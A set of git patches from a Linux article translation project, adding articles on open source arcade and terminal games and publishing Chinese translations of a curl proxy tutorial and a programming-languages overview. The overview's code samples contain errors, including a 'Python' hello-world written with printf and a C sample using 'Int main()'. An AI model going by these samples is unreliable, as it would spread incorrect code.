+5 arcade-style games in your Linux repository
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/arcade_game_gaming.jpg?itok=84Rjk_32)
+
+Gaming has traditionally been one of Linux's weak points. That has changed somewhat in recent years thanks to [Steam][1], [GOG][2], and other efforts to bring commercial games to multiple operating systems, but those games often are not open source. Sure, the games can be played on an open source operating system, but that is not good enough for an open source purist.
+
+So, can someone who uses only free and open source software find games that are polished enough to present a solid gaming experience without compromising their open source ideals? Absolutely! While most open source games are unlikely to rival some of the AAA commercial games developed with massive budgets, there are plenty of open source games, in many genres, that are fun to play and can be installed from the repositories of most major Linux distributions.
+
+I am starting this series of articles on open source games for Linux by looking at arcade-style games. In future articles, I plan to cover board & card, puzzle, racing, role-playing, and strategy & simulation games.
+
+### AstroMenace
+
+![](https://opensource.com/sites/default/files/u128651/astromenace.png)
+
+[AstroMenace][3] is a scrolling space shooter for the modern era. It began as a closed source game, but the code and art assets have since been released under open licenses. Gameplay is fairly typical for the style of game, but it features nice, modern 3D graphics. Ship and weapon upgrades can be purchased using the points earned from shooting down enemies. The difficulty level can be tweaked by changing a wide variety of options, so the game is approachable to new players while still offering a challenge to experienced ones.
+
+To install AstroMenace, run the following command:
+
+ * On Fedora: `dnf install astromenace`
+ * On Debian/Ubuntu: `apt install astromenace`
+
+
+
+### Battle Tanks
+
+![](https://opensource.com/sites/default/files/u128651/battle_tanks.png)
+
+[Battle Tanks][4] is a fast-paced tank battle game with an overhead perspective. Players maneuver one of three different vehicle types around a map, collecting power-ups and trying to blow up their opponents. It has deathmatch, team deathmatch, capture the flag, and cooperative game modes. There are nine maps for the deathmatch and capture the flag modes and four maps for cooperative mode. The game supports split-screen local multiplayer for two players and local area network multiplayer for larger matches. Gameplay is fast-paced, and the default match length of five minutes is short, which makes Battle Tanks a nice choice for gamers who want something quick to play.
+
+To install Battle Tanks, run the following command:
+
+ * On Fedora: `dnf install btanks`
+ * On Debian/Ubuntu: `apt install btanks`
+
+
+
+### M.A.R.S.
+
+![](https://opensource.com/sites/default/files/u128651/m.a.r.s.png)
+
+[M.A.R.S.][5] is a top-down space shooter with physics similar to the classic Asteroids arcade game. Players control a spaceship while shooting at their opponents, maneuvering around the screen, and avoiding planets and opponents' incoming fire. The standard death match and team death match modes are available, but there are other modes, like one that requires pushing a ball into the opposing team's home planet, that provide some variety to the gameplay options. It supports local multiplayer, but unfortunately network multiplayer has not been implemented. Since development on the game appears to have stalled, network multiplayer is not likely to appear at any point in the near future, but the game is still fun and playable without it.
+
+To install M.A.R.S., run the following command:
+
+ * On Fedora: `dnf install marsshooter`
+ * On Debian/Ubuntu: `apt install marsshooter`
+
+
+
+### Neverball
+
+![](https://opensource.com/sites/default/files/u128651/neverball.png)
+
+With gameplay inspired by Sega's Super Monkey Ball, [Neverball][6] challenges the player to move a ball through a 3D playing field by moving the playing field, not the ball. The objective is to collect enough coins to open a level's exit and maneuver the ball to the exit before time runs out. There are seven different sets of levels, which range in difficulty from easy to impossible. The game can be played using the keyboard, mouse, or joystick.
+
+To install Neverball, run the following command:
+
+ * On Fedora: `dnf install neverball`
+ * On Debian/Ubuntu: `apt install neverball`
+
+
+
+### SuperTux
+
+![](https://opensource.com/sites/default/files/u128651/supertux.png)
+
+[SuperTux][7] is a 2D platformer modeled after Nintendo's Super Mario Bros. games. Linux's mascot, Tux the Penguin, takes the place of Mario with eggs serving as the equivalent of Super Mario Bros.'s mushroom power-ups. When Tux is powered up with an egg, he can collect flowers that grant him extra abilities. The fire flower, which lets Tux throw fireballs, is the most common in the game's levels, but ice, air, and earth flowers are included in the game's code. Collecting star power-ups makes Tux temporarily invincible, just like in the Super Mario games. The default level set, Icy Island, is 30 levels, making the game approximately the same length as the original Super Mario Bros., but SuperTux also comes with several contributed level sets, including three bonus islands, a forest island, a Halloween island, and incubator and test levels. SuperTux has a built-in level editor, so users can create their own.
+
+To install SuperTux, run the following command:
+
+ * On Fedora: `dnf install supertux`
+ * On Debian/Ubuntu: `apt install supertux`
+
+
+
+Did I miss one of your favorite open source arcade games? Share it in the comments below.
+### About the author
+Joshua Allen Holm - Joshua Allen Holm, MLIS, MEd, is one of Opensource.com's Community Moderators. Joshua's main interests are digital humanities, open access, and open educational resources. You can find Joshua on GitHub, GitLab, LinkedIn, and Zotero. He can reached at holmja@opensource.com.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/arcade-games-linux
+
+作者:[Joshua Allen Holm][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/holmja
+[1]:http://store.steampowered.com/
+[2]:https://www.gog.com/
+[3]:http://www.viewizard.com/
+[4]:http://btanks.sourceforge.net/blog/about-game
+[5]:http://mars-game.sourceforge.net/?page_id=10
+[6]:https://neverball.org/index.php
+[7]:http://supertux.org/
From 0edd50271b8cf8be2014a6aa8d7a2811c4634bc5 Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 19:16:49 +0800
Subject: [PATCH 200/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Top=2010=20Comman?=
=?UTF-8?q?d=20Line=20Games=20For=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...808 Top 10 Command Line Games For Linux.md | 240 ++++++++++++++++++
1 file changed, 240 insertions(+)
create mode 100644 sources/tech/20160808 Top 10 Command Line Games For Linux.md
diff --git a/sources/tech/20160808 Top 10 Command Line Games For Linux.md b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
new file mode 100644
index 0000000000..ebce8a8073
--- /dev/null
+++ b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
@@ -0,0 +1,240 @@
+Top 10 Command Line Games For Linux
+======
+Brief: This article lists the **best command line games for Linux**.
+
+Linux has never been the preferred operating system for gaming. Though [gaming on Linux][1] has improved a lot lately. You can [download Linux games][2] from a number of resources.
+
+There are dedicated [Linux distributions for gaming][3]. Yes, they do exist. But, we are not going to see the Linux gaming distributions today.
+
+Linux has one added advantage over its Windows counterpart. It has got the mighty Linux terminal. You can do a hell lot of things in terminal including playing **command line games**.
+
+Yeah, hardcore terminal lovers, gather around. Terminal games are light, fast and hell lotta fun to play. And the best thing of all, you've got a lot of classic retro games in Linux terminal.
+
+[Suggested read: Gaming On Linux:All You Need To Know][20]
+
+### Best Linux terminal games
+
+So let's crack this list and see what are some of the best Linux terminal games.
+
+### 1. Bastet
+
+Who hasn't spent hours together playing [Tetris][4]? Simple, but totally addictive. Bastet is the Tetris of Linux.
+
+![Bastet Linux terminal game][5]
+
+Use the command below to get Bastet:
+```
+sudo apt install bastet
+```
+
+To play the game, run the below command in terminal:
+```
+bastet
+```
+
+Use spacebar to rotate the bricks and arrow keys to guide.
+
+### 2. Ninvaders
+
+Space Invaders. I remember tussling for high score with my brother on this. One of the best arcade games out there.
+
+![nInvaders command line game in Linux][6]
+
+Copy paste the command to install Ninvaders.
+```
+sudo apt-get install ninvaders
+```
+
+To play this game, use the command below:
+```
+ninvaders
+```
+
+Arrow keys to move the spaceship. Space bar to shoot at the aliens.
+
+[Suggested read:Top 10 Best Linux Games eleased in 2016 That You Can Play Today][21]
+
+
+### 3. Pacman4console
+
+Yes, the King of the Arcade is here. Pacman4console is the terminal version of the popular arcade hit, Pacman.
+
+![Pacman4console is a command line Pacman game in Linux][7]
+
+Use the command to get pacman4console:
+```
+sudo apt-get install pacman4console
+```
+
+Open a terminal, and I suggest you maximize it. Type the command below to launch the game:
+```
+pacman4console
+```
+
+Use the arrow keys to control the movement.
+
+### 4. nSnake
+
+Remember the snake game in old Nokia phones?
+
+That game kept me hooked to the phone for a really long time. I used to devise various coiling patterns to manage the grown up snake.
+
+![nsnake : Snake game in Linux terminal][8]
+
+We have the [snake game in Linux terminal][9] thanks to [nSnake][9]. Use the command below to install it.
+```
+sudo apt-get install nsnake
+```
+
+To play the game, type in the below command to launch the game.
+```
+nsnake
+```
+
+Use arrow keys to move the snake and feed it.
+
+### 5. Greed
+
+Greed is little like Tron, minus the speed and adrenaline.
+
+Your location is denoted by a blinking '@'. You are surrounded by numbers and you can choose to move in any of the 4 directions,
+
+The direction you choose has a number and you move exactly that number of steps. And you repeat the step again. You cannot revisit the visited spot again and the game ends when you cannot make a move.
+
+I made it sound more complicated than it really is.
+
+![Greed : Tron game in Linux command line][10]
+
+Grab greed with the command below:
+```
+sudo apt-get install greed
+```
+
+To launch the game use the command below. Then use the arrow keys to play the game.
+```
+greed
+```
+
+### 6. Air Traffic Controller
+
+What's better than being a pilot? An air traffic controller. You can simulate an entire air traffic system in your terminal. To be honest, managing air traffic from a terminal kinda feels, real.
+
+![Air Traffic Controller game in Linux][11]
+
+Install the game using the command below:
+```
+sudo apt-get install bsdgames
+```
+
+Type in the command below to launch the game:
+```
+atc
+```
+
+ATC is not a child's play. So read the man page using the command below.
+
+### 7. Backgammon
+
+Whether You have played [Backgammon][12] before or not, You should check this out. The instructions and control manuals are all so friendly. Play it against computer or your friend if you prefer.
+
+![Backgammon terminal game in Linux][13]
+
+Install Backgammon using this command:
+```
+sudo apt-get install bsdgames
+```
+
+Type in the below command to launch the game:
+```
+backgammon
+```
+
+Press 'y' when prompted for rules of the game.
+
+### 8. Moon Buggy
+
+Jump. Fire. Hours of fun. No more words.
+
+![Moon buggy][14]
+
+Install the game using the command below:
+```
+sudo apt-get install moon-buggy
+```
+
+Use the below command to start the game:
+```
+moon-buggy
+```
+
+Press space to jump, 'a' or 'l' to shoot. Enjoy
+
+### 9. 2048
+
+Here's something to make your brain flex. [2048][15] is a strategic as well as a highly addictive game. The goal is to get a score of 2048.
+
+![2048 game in Linux terminal][16]
+
+Copy paste the commands below one by one to install the game.
+```
+wget https://raw.githubusercontent.com/mevdschee/2048.c/master/2048.c
+
+gcc -o 2048 2048.c
+```
+
+Type the below command to launch the game and use the arrow keys to play.
+```
+./2048
+```
+
+### 10. Tron
+
+How can this list be complete without a brisk action game?
+
+![Tron Linux terminal game][17]
+
+Yes, the snappy Tron is available on Linux terminal. Get ready for some serious nimble action. No installation hassle nor setup hassle. One command will launch the game. All You need is an internet connection.
+```
+ssh sshtron.zachlatta.com
+```
+
+You can even play this game in multiplayer if there are other gamers online. Read more about [Tron game in Linux][18].
+
+### Your pick?
+
+There you have it, people. Top 10 Linux terminal games. I guess it's ctrl+alt+T now. What is Your favorite among the list? Or got some other fun stuff for the terminal? Do share.
+
+With inputs from [Abhishek Prakash][19].
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-command-line-games-linux/
+
+作者:[Aquil Roshan][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/aquil/
+[1]:https://itsfoss.com/linux-gaming-guide/
+[2]:https://itsfoss.com/download-linux-games/
+[3]:https://itsfoss.com/manjaro-gaming-linux/
+[4]:https://en.wikipedia.org/wiki/Tetris
+[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/bastet.jpg
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/ninvaders.jpg
+[7]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/pacman.jpg
+[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/nsnake.jpg
+[9]:https://itsfoss.com/nsnake-play-classic-snake-game-linux-terminal/
+[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/greed.jpg
+[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/atc.jpg
+[12]:https://en.wikipedia.org/wiki/Backgammon
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/backgammon.jpg
+[14]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/moon-buggy.jpg
+[15]:https://itsfoss.com/2048-offline-play-ubuntu/
+[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/2048.jpg
+[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2016/08/tron.jpg
+[18]:https://itsfoss.com/play-tron-game-linux-terminal/
+[19]:https://twitter.com/abhishek_pc
+[20]:https://itsfoss.com/linux-gaming-guide/
+[21]:https://itsfoss.com/best-linux-games/
From 5d4541d2f9caf3f4fd4017b7fbdf6c1db69a9175 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Tue, 9 Jan 2018 20:57:12 +0800
Subject: [PATCH 201/371] =?UTF-8?q?=E7=A8=8D=E4=BD=9C=E4=BF=AE=E6=94=B9?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...108 SuperTux- A Linux Take on Super Mario Game.md | 12 +++++-------
1 file changed, 5 insertions(+), 7 deletions(-)
diff --git a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
index ee4dadcc11..5cba5cda29 100644
--- a/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
+++ b/sources/tech/20180108 SuperTux- A Linux Take on Super Mario Game.md
@@ -4,7 +4,7 @@ When people usually think of PC games, they think of big titles, like Call of Du
I am going to review one such game that I love to play. It's called SuperTux.
-https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&
+[video](https://www.youtube.com/embed/pTax8-cdiZU?enablejsapi=1&autoplay=0&cc_load_policy=0&iv_load_policy=1&loop=0&modestbranding=1&rel=0&showinfo=0&fs=1&theme=dark&color=red&autohide=2&controls=2&playsinline=0&)
### What is SuperTux
@@ -23,12 +23,10 @@ Playing SuperTux is very similar to Super Mario. You play through different leve
Just like in Super Mario, Tux can jump and hit special blocks to get stuff. Most of the time, these blocks contain coins. You can also find powerups, such as eggs, which will allow you to become BigTux. The other [powerups][6] include Fireflowers, Iceflowers, Airflowers, and Earthflowers. According to the [SuperTux wiki][7]:
-> * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
-> * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
-> * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
-> * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
->
-
+ * Fireflowers will allow you to kill most badguys by pressing the action key, which makes Tux throw a fireball
+ * Iceflowers will allow you to freeze some badguys and kill some others by pressing the action key, which makes Tux throw a ball of ice. If they are frozen, you can kill most badguys by butt-jumping on them.
+ * Airflowers will allow you to jump further, sometimes even run faster. However, it can be difficult to do certain jumps as Air Tux.
+ * Earthflowers give you a light. Also, pressing the action key then down will turn you into a rock for a few seconds, which means Tux is completely invulnerable.
Occasionally, you will see a bell. That is a checkpoint. If you touch it, you will respawn at that point when you die, instead of having to go back to the beginning. You are limited to three respawns at the checkpoint before you are sent to the beginning of the level.
From f2e7e509430c2d13e1b2b7ca6b183c54a2dacfe6 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 21:43:40 +0800
Subject: [PATCH 202/371] PRF&PUB:20160117 How to use curl command with proxy
username-password on Linux- Unix.md
@lujun9972
---
... proxy username-password on Linux- Unix.md | 50 ++++++++++++-------
1 file changed, 33 insertions(+), 17 deletions(-)
rename {translated/tech => published}/20160117 How to use curl command with proxy username-password on Linux- Unix.md (71%)
diff --git a/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md b/published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
similarity index 71%
rename from translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
rename to published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
index 8e3e1dae81..a46d892a55 100644
--- a/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
+++ b/published/20160117 How to use curl command with proxy username-password on Linux- Unix.md
@@ -1,8 +1,8 @@
-translating by lujun9972
如何让 curl 命令通过代理访问
======
我的系统管理员给我提供了如下代理信息:
+
```
IP: 202.54.1.1
Port: 3128
@@ -10,14 +10,16 @@ Username: foo
Password: bar
```
-该设置在 Google Chrome 和 Firefox 浏览器上很容易设置。但是我要怎么把它应用到 curl 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
+该设置在 Google Chrome 和 Firefox 浏览器上很容易设置。但是我要怎么把它应用到 `curl` 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
-很多 Linux 和 Unix 命令行工具(比如 curl 命令,wget 命令,lynx 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。**本文就会演示一下如何让 curl 通过代理服务器发送 HTTP/HTTPS 请求。**
+很多 Linux 和 Unix 命令行工具(比如 `curl` 命令,`wget` 命令,`lynx` 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。
-## 让 curl 命令使用代理的语法
+本文就会演示一下如何让 `curl` 通过代理服务器发送 HTTP/HTTPS 请求。
+### 让 curl 命令使用代理的语法
语法为:
+
```
## Set the proxy address of your uni/company/vpn network ##
export http_proxy=http://your-ip-address:port/
@@ -30,8 +32,8 @@ export https_proxy=https://your-ip-address:port/
export https_proxy=https://user:password@your-proxy-ip-address:port/
```
+另一种方法是使用 `curl` 命令的 `-x` 选项:
-另一种方法是使用 curl 命令的 -x 选项:
```
curl -x <[protocol://][user:password@]proxyhost[:port]> url
--proxy <[protocol://][user:password@]proxyhost[:port]> url
@@ -39,9 +41,10 @@ curl -x <[protocol://][user:password@]proxyhost[:port]> url
-x http://user:password@Your-Ip-Here:Port url
```
-## 在 Linux 上的一个例子
+### 在 Linux 上的一个例子
首先设置 `http_proxy`:
+
```
## proxy server, 202.54.1.1, port: 3128, user: foo, password: bar ##
export http_proxy=http://foo:bar@202.54.1.1:3128/
@@ -50,6 +53,7 @@ export https_proxy=$http_proxy
curl -I https://www.cyberciti.biz
curl -v -I https://www.cyberciti.biz
```
+
输出为:
```
@@ -98,42 +102,54 @@ Connection: keep-alive
```
本例中,我来下载一个 pdf 文件:
+
```
$ export http_proxy="vivek:myPasswordHere@10.12.249.194:3128/"
$ curl -v -O http://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-也可以使用 -x 选项:
+
+也可以使用 `-x` 选项:
+
```
curl -x 'http://vivek:myPasswordHere@10.12.249.194:3128' -v -O https://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-输出为:
-![Fig.01:curl in action \(click to enlarge\)][1]
-## Unix 上的一个例子
+输出为:
+
+![Fig.01:curl in action \(click to enlarge\)][2]
+
+### Unix 上的一个例子
```
$ curl -x http://prox_server_vpn:3128/ -I https://www.cyberciti.biz/faq/howto-nginx-customizing-404-403-error-page/
```
-## socks 协议怎么办呢?
+### socks 协议怎么办呢?
语法也是一样的:
+
```
curl -x socks5://[user:password@]proxyhost[:port]/ url
curl --socks5 192.168.1.254:3099 https://www.cyberciti.biz/
```
-## 如何让代理设置永久生效?
+### 如何让代理设置永久生效?
+
+编辑 `~/.curlrc` 文件:
+
+```
+$ vi ~/.curlrc
+```
-编辑 ~/.curlrc 文件:
-`$ vi ~/.curlrc`
添加下面内容:
+
```
proxy = server1.cyberciti.biz:3128
proxy-user = "foo:bar"
```
保存并关闭该文件。另一种方法是在你的 `~/.bashrc` 文件中创建一个别名:
+
```
## alias for curl command
## set proxy-server and port, the syntax is
@@ -141,7 +157,7 @@ proxy-user = "foo:bar"
alias curl = "curl -x server1.cyberciti.biz:3128"
```
-记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`,`socks4a://`,`socks5:// `或者 `socks5h://` 来指定使用的 SOCKS 版本。若没有指定协议或者 `http://` 表示 HTTP 协议。若没有指定端口号则默认为 1080。-x 选项的值要优先于环境变量设置的值。若不想走代理,而环境变量总设置了代理,那么可以通过设置代理为 "" 来覆盖环境变量的值。[详细信息请参阅 curl 的 man 页 ][3]。
+记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`,`socks4a://`,`socks5:// `或者 `socks5h://` 来指定使用的 SOCKS 版本。若没有指定协议或者使用 `http://` 表示 HTTP 协议。若没有指定端口号则默认为 `1080`。`-x` 选项的值要优先于环境变量设置的值。若不想走代理,而环境变量总设置了代理,那么可以通过设置代理为空值(`""`)来覆盖环境变量的值。[详细信息请参阅 `curl` 的 man 页 ][3]。
--------------------------------------------------------------------------------
@@ -150,11 +166,11 @@ via: https://www.cyberciti.biz/faq/linux-unix-curl-command-with-proxy-username-p
作者:[Vivek Gite][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/media/new/faq/2016/01/curl-download-output-300x141.jpg
-[2]:https://www.cyberciti.biz//www.cyberciti.biz/media/new/faq/2016/01/curl-download-output.jpg
+[2]:https://www.cyberciti.biz/media/new/faq/2016/01/curl-download-output.jpg
[3]:https://curl.haxx.se/docs/manpage.html
From 91fe77cf462a07e56c612ea2459c591690e9ae49 Mon Sep 17 00:00:00 2001
From: wxy
Date: Tue, 9 Jan 2018 22:15:40 +0800
Subject: [PATCH 203/371] PRF&PUB:20171227 Best Programming Languages To Learn
In 2018.md
@qhwdw
---
... Programming Languages To Learn In 2018.md | 39 +++++++------------
1 file changed, 14 insertions(+), 25 deletions(-)
rename {translated/tech => published}/20171227 Best Programming Languages To Learn In 2018.md (75%)
diff --git a/translated/tech/20171227 Best Programming Languages To Learn In 2018.md b/published/20171227 Best Programming Languages To Learn In 2018.md
similarity index 75%
rename from translated/tech/20171227 Best Programming Languages To Learn In 2018.md
rename to published/20171227 Best Programming Languages To Learn In 2018.md
index 5365a9076e..9b6a4a286e 100644
--- a/translated/tech/20171227 Best Programming Languages To Learn In 2018.md
+++ b/published/20171227 Best Programming Languages To Learn In 2018.md
@@ -3,17 +3,16 @@
![](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/best-programming-languages-learn-for-2018_orig.jpg)
-编程现在已经变成最受欢迎的职业之一,不像以前,编制软件只局限于少数几种**编程语言**。现在,我们有很多种编程语言可以选择。随着跨平台支持需求的增多,大多数编程语言都可以被用于多种任务。如果,你还没有准备好,让我们看一下在 2018 年你可能会学习的编程语言有哪些。
+编程现在已经变成最受欢迎的职业之一,不像以前,编制软件只局限于少数几种**编程语言**。现在,我们有很多种编程语言可以选择。随着跨平台支持的增多,大多数编程语言都可以被用于多种任务。如果,你还没有学会编程,让我们看一下在 2018 年你可能会学习的编程语言有哪些。
-## 在 2018 年最值得去学习的编程语言
### Python
[![learn programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/learn-programming-language_orig.png)][1]
-毫无疑问, [Python][2] 现在已经统治着(ruling)编程的市场份额。它发起于 1991 年,自从 [YouTube][3] 开始使用它之后,python 已经真正的成为最著名的编程语言。Python 可以被用于各类领域,比如,Web 开发、游戏开发、脚本、科学研究、以及大多数你能想到的领域。它是跨平台的,并且运行在一个解释程序中。Python 的语法非常简单,因为它使用缩进代替花括号来对代码块进行分组,因此,代码非常清晰。
+毫无疑问, [Python][2] 现在已经统治着编程市场。它发起于 1991 年,自从 [YouTube][3] 开始使用它之后,Python 已经真正的成为著名编程语言。Python 可以被用于各类领域,比如,Web 开发、游戏开发、脚本、科学研究、以及大多数你能想到的领域。它是跨平台的,并且运行在一个解释程序中。Python 的语法非常简单,因为它使用缩进代替花括号来对代码块进行分组,因此,代码非常清晰。
-**示例 -**
+**示例:**
```
printf("Hello world!")
@@ -23,27 +22,21 @@ printf("Hello world!")
[![kotlin programming language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/kotlin-programming-language_orig.jpg)][4]
-虽然 Java 自它诞生以来从没有被超越过,但是,至少在 Android 编程方面,Kotlin 在正打破这种局面。Kotlin 是较新的一个编程语言,它被 Google 官方支持用于Android 应用编程。它是 Java 的替代者,并且可以与 [java][5] 代码无缝衔接。代码大幅减少并且更加清晰。因此,在 2018 年,Kotlin 将是最值的去学习的编程语言。
+虽然 Java 自它诞生以来从没有被超越过,但是,至少在 Android 编程方面,Kotlin 在正打破这种局面。Kotlin 是较新的一个编程语言,它被 Google 官方支持用于 Android 应用编程。它是 Java 的替代者,并且可以与 [java][5] 代码无缝衔接。代码大幅减少并且更加清晰。因此,在 2018 年,Kotlin 将是最值的去学习的编程语言。
-**示例 -**
+**示例**
```
class Greeter(val name: String) {
-
fun greet() {
-
println("Hello, $name")
-
}
-
}
-String Interpolation to cut down ceremony.
+// String Interpolation to cut down ceremony.
fun main(args: Array) {
-
Greeter(args[0]).greet()
-
}
```
@@ -51,19 +44,15 @@ fun main(args: Array) {
这可能是他们在中学和大学里教的第一个编程语言。C 是比较老的编程语言之一,由于它的代码运行速度快而且简单,它到现在仍然一直被使用。虽然它的学习难度比较大,但是,一旦你掌握了它,你就可以做任何语言能做的事情。你可能不会用它去做高级的网站或者软件,但是,C 是嵌入式设备的首选编程语言。随着物联网的普及,C 将被再次广泛的使用,对于 C++,它被广泛用于一些大型软件。
-**示例 -**
+**示例**
```
-#include
+#include
Int main()
-
{
-
printf("Hello world");
-
return 0;
-
}
```
@@ -73,7 +62,7 @@ Int main()
关于 PHP 即将消亡的话题,因特网上正在疯传,但是,我没有看到一个为什么不去学习 PHP 的理由,它是服务器端脚本语言中比较优秀的一个,它的语法结构非常简单。一半以上的因特网都运行在 PHP 上。[Wordpress][7],这个最流行的内容管理系统是用 PHP 写的。因为,这个语言流行的时间已经超过 20 年了,它已经有了足够多的库。在这些库中,你总能找到一个是适合你的工作的。
-**示例 -**
+**示例**
```
echo "Hello world!";
@@ -83,9 +72,9 @@ echo "Hello world!";
![javascript programming language for web](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/javascript_orig.png)
-关于 Javascript,我说些什么呢?这是目前最为需要的语言。Javascript 主要用于网站动态生成页面。但是,现在 JavaScript 已经演进到可以做更多的事情。全部的后端框架都是用 JavaScript 构建的。Hybrid 应用是用 HTML+JS 写的,它被用于构建任何移动端的平台。使用 Javascript 的 nodejs 甚至被用于服务器端的脚本。
+关于 Javascript,我说些什么呢?这是目前最为需要的语言。Javascript 主要用于网站动态生成页面。但是,现在 JavaScript 已经演进到可以做更多的事情。整个前后端框架都可以用 JavaScript 构建。Hybrid 应用是用 HTML+JS 写的,它被用于构建任何移动端的平台。使用 Javascript 的 nodejs 甚至被用于服务器端的脚本。
-**示例 -**
+**示例**
```
document.write("Hello world!");
@@ -95,9 +84,9 @@ document.write("Hello world!");
[![sql database language](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/published/sql-database-language.png?1514386856)][8]
-SQL 是一个关系型数据库管理系统(RDBMS)的查询语言,它用于从数据库中获取数据。SQL 的主要实现或多或少都是非常相似的。数据库用途非常广泛。你读的这篇文章它就保存在我们网站的数据库中。因此,学会它是非常有用的。
+SQL 是关系型数据库管理系统(RDBMS)的查询语言,它用于从数据库中获取数据。SQL 的主要实现或多或少都是非常相似的。数据库用途非常广泛。你读的这篇文章它就保存在我们网站的数据库中。因此,学会它是非常有用的。
-**示例 -**
+**示例**
```
SELECT * FROM TABLENAME
@@ -113,7 +102,7 @@ via: http://www.linuxandubuntu.com/home/best-programming-languages-to-learn-in-2
作者:[LinuxAndUbuntu][a]
译者:[qhwdw](https://github.com/qhwdw)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From f99dc52e018ea4c3da123a5aa929f9082361e6cc Mon Sep 17 00:00:00 2001
From: darksun
Date: Tue, 9 Jan 2018 23:04:13 +0800
Subject: [PATCH 204/371] translate done: 20170915 12 ip Command Examples for
Linux Users.md
---
... 12 ip Command Examples for Linux Users.md | 196 ------------------
... 12 ip Command Examples for Linux Users.md | 195 +++++++++++++++++
2 files changed, 195 insertions(+), 196 deletions(-)
delete mode 100644 sources/tech/20170915 12 ip Command Examples for Linux Users.md
create mode 100644 translated/tech/20170915 12 ip Command Examples for Linux Users.md
diff --git a/sources/tech/20170915 12 ip Command Examples for Linux Users.md b/sources/tech/20170915 12 ip Command Examples for Linux Users.md
deleted file mode 100644
index ded3be8f3b..0000000000
--- a/sources/tech/20170915 12 ip Command Examples for Linux Users.md
+++ /dev/null
@@ -1,196 +0,0 @@
-translating by lujun9972
-12 ip Command Examples for Linux Users
-======
